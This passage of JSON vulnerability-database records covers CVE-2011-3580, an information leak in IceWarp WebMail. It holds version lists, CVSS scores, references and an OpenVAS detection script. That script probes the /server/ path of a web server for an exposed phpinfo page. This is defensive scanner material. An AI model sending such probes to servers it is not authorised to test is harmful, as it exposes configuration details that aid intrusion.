information via a direct request to the /server URI, which triggers a call to the phpinfo function.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T05:51:06", "references": [{"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27071"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2021-02-02T05:51:06", "rev": 2, "value": 6.0, "vector": "NONE"}}, "extraReferences": [{"name": "49753", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/49753"}, {"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "refsource": "MISC", "tags": ["Exploit"], "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"}, {"name": "1026093", "refsource": "SECTRACK", "tags": [], "url": "http://securitytracker.com/id?1026093"}, {"name": "8404", "refsource": "SREASON", "tags": [], "url": "http://securityreason.com/securityalert/8404"}, {"name": "icewarpwebmail-phpinfo-info-disc(70026)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/70026"}, {"name": "75722", "refsource": "OSVDB", "tags": [], "url": "http://www.osvdb.org/75722"}, {"name": "20110923 TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server", "refsource": "BUGTRAQ", "tags": ["Exploit"], "url": "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html"}], "hash": "9d917bacaf3b54d8c2def108baa161988dc0a492eb8e4f2136bf74f3236d7079", "hashmap": [{"hash": "fd491ff95fc43c201d07e4cada6dc489", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f30109dfdbfbf783c0b61792a6b2c20a", "key": "cvss2"}, {"hash": "214ee6a16ec427eae42819d57552e457", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "8372bab5a2b07ce8c58960126bc7fa81", "key": "cpeConfiguration"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "cd349445e80e8b2179f25196bdaf10dc", "key": "cpe"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ad748ca54d687532479fdfb825a5f871", "key": "affectedSoftware"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "c5f73a003796a1ee2c10cd02ae7d86b2", "key": "cpe23"}, {"hash": "be7a08449a34556fa4ea0840b564e7f3", "key": "cvelist"}, {"hash": "07d3f7b2955caa3b6538d5a344d51a1d", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5da245d7cfd34f4916f532f2437ed3a8", "key": "title"}, {"hash": "ac9a8cc07be6deac41aed2625ae4cc32", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "d3facac8ad40d6b5e1e035dbb0fcdceb", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3580", "id": "CVE-2011-3580", "immutableFields": [], "lastseen": "2021-02-02T05:51:06", "modified": "2017-08-29T01:30:00", "objectVersion": "1.5", "published": "2011-09-30T17:55:00", "references": ["http://www.securityfocus.com/bid/49753", "http://www.osvdb.org/75722", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70026", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "reporter": "cve@mitre.org", "title": "CVE-2011-3580", "type": "cve", "viewCount": 4}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T05:51:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.7"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.8"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "le", "version": "10.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2011-3580"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-200"], "description": "IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to obtain configuration information via a direct request to the /server URI, which triggers a call to the phpinfo function.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:01:27", "references": [{"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27071"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2020-09-21T14:01:27", "rev": 2, "value": 6.0, "vector": "NONE"}}, "hash": "33f9c94e251a76b9a2eff43be4cecc58f53c5c3cd6f89171f36d8aa200d376f3", "hashmap": [{"hash": "fd491ff95fc43c201d07e4cada6dc489", "key": "description"}, {"hash": "f30109dfdbfbf783c0b61792a6b2c20a", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "cd349445e80e8b2179f25196bdaf10dc", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ad748ca54d687532479fdfb825a5f871", "key": "affectedSoftware"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "c5f73a003796a1ee2c10cd02ae7d86b2", "key": "cpe23"}, {"hash": "be7a08449a34556fa4ea0840b564e7f3", "key": "cvelist"}, {"hash": "07d3f7b2955caa3b6538d5a344d51a1d", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5da245d7cfd34f4916f532f2437ed3a8", "key": "title"}, {"hash": "ac9a8cc07be6deac41aed2625ae4cc32", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "d3facac8ad40d6b5e1e035dbb0fcdceb", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3580", "id": "CVE-2011-3580", "lastseen": "2020-09-21T14:01:27", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-09-30T17:55:00", "references": ["http://www.securityfocus.com/bid/49753", "http://www.osvdb.org/75722", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70026", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "reporter": "cve@mitre.org", "title": "CVE-2011-3580", "type": "cve", "viewCount": 1}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:01:27"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "ad748ca54d687532479fdfb825a5f871"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "cd349445e80e8b2179f25196bdaf10dc"}, {"key": "cpe23", "hash": "c5f73a003796a1ee2c10cd02ae7d86b2"}, {"key": "cpeConfiguration", "hash": "a8d0987ef59bbb82609435f1e9c14370"}, {"key": "cvelist", "hash": "be7a08449a34556fa4ea0840b564e7f3"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "f30109dfdbfbf783c0b61792a6b2c20a"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "b647a850fd42b235dd11ee60cf626f2d"}, {"key": "description", "hash": "fd491ff95fc43c201d07e4cada6dc489"}, {"key": "extraReferences", "hash": "214ee6a16ec427eae42819d57552e457"}, {"key": "href", "hash": "ac9a8cc07be6deac41aed2625ae4cc32"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "79f130ef461e5fcadeacc002df89c60a"}, {"key": "published", "hash": "07d3f7b2955caa3b6538d5a344d51a1d"}, {"key": "references", "hash": "d3facac8ad40d6b5e1e035dbb0fcdceb"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5da245d7cfd34f4916f532f2437ed3a8"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "0c6ce49e52923ad88ef64d24b65f0c5fe95aea7b53cc78a317379fa503ce99c6", "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105320"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27071"]}], "modified": "2021-04-22T23:19:42", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-04-22T23:19:42", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "affectedSoftware": [{"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.7"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.8"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "le", "version": "10.3.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cwe": ["CWE-200"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.3.2", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "49753", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/49753"}, {"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "refsource": "MISC", "tags": ["Exploit"], "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"}, {"name": "1026093", "refsource": "SECTRACK", "tags": [], "url": "http://securitytracker.com/id?1026093"}, {"name": "8404", "refsource": "SREASON", "tags": [], "url": "http://securityreason.com/securityalert/8404"}, {"name": "icewarpwebmail-phpinfo-info-disc(70026)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/70026"}, {"name": "75722", "refsource": "OSVDB", "tags": [], "url": "http://www.osvdb.org/75722"}, {"name": "20110923 TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server", "refsource": "BUGTRAQ", "tags": ["Exploit"], "url": "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html"}], "immutableFields": []}], "openvas": [{"id": "OPENVAS:103279", "hash": "2494d2b7fe3b49012357a2f2bf93383e", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "description": "IceWarp Web Mail is prone to multiple information-disclosure\nvulnerabilities.\n\nAttackers can exploit these issues to gain access to potentially\nsensitive information, and possibly cause denial-of-service\nconditions; other attacks may also be possible.", "published": "2011-09-28T00:00:00", "modified": "2017-07-12T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=103279", "reporter": "This script is Copyright (C) 2011 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/49753", "http://www.icewarp.com/Products/IceWarp_Web_Mail/", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2017-07-27T10:55:29", "history": [{"lastseen": "2017-07-02T21:13:42", "differentElements": ["modified", "sourceData"], "edition": 1, "bulletin": {"id": "OPENVAS:103279", "hash": "364706c845e03e81231f97fa6faf759896b8994018e19699ae4789c7336b9d6b", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "description": "IceWarp Web Mail is prone to multiple information-disclosure\nvulnerabilities.\n\nAttackers can exploit these issues to gain access to potentially\nsensitive information, and possibly cause denial-of-service\nconditions; other attacks may also be possible.", "published": "2011-09-28T00:00:00", "modified": "2017-03-29T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=103279", "reporter": "This script is Copyright (C) 2011 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/49753", "http://www.icewarp.com/Products/IceWarp_Web_Mail/", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2017-07-02T21:13:42", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "pluginID": "103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_IceWarp_49753.nasl 5769 2017-03-29 13:50:21Z cfi $\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"IceWarp Web Mail is prone to multiple information-disclosure\nvulnerabilities.\n\nAttackers can exploit these issues to gain access to potentially\nsensitive information, and possibly cause denial-of-service\nconditions; other attacks may also be possible.\";\n\ntag_solution = \"Vendor updates are available. Please see the references for more\ninformation.\";\n\nif (description)\n{\n script_id(103279);\n script_version(\"$Revision: 5769 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-29 15:50:21 +0200 (Wed, 29 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\",\"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/49753\");\n script_xref(name : \"URL\" , value : \"http://www.icewarp.com/Products/IceWarp_Web_Mail/\");\n script_xref(name : \"URL\" , value : \"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port))exit(0);\n\nbanner = get_http_banner(port:port);\nif(!banner || \"IceWarp\" >!< banner)exit(0);\n\nforeach dir( make_list_unique( \"/webmail\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/server/\"); \n\n if(http_vuln_check(port:port, url:url,pattern:\"<title>phpinfo\$\$\")) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "naslFamily": "Web application abuses"}}], "viewCount": 1, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2017-07-27T10:55:29", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3579", "CVE-2011-3580"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902478", "OPENVAS:1361412562310103279"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105320"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11920", "SECURITYVULNS:DOC:27071"]}, {"type": "exploitdb", "idList": ["EDB-ID:36165"]}], "modified": "2017-07-27T10:55:29", "rev": 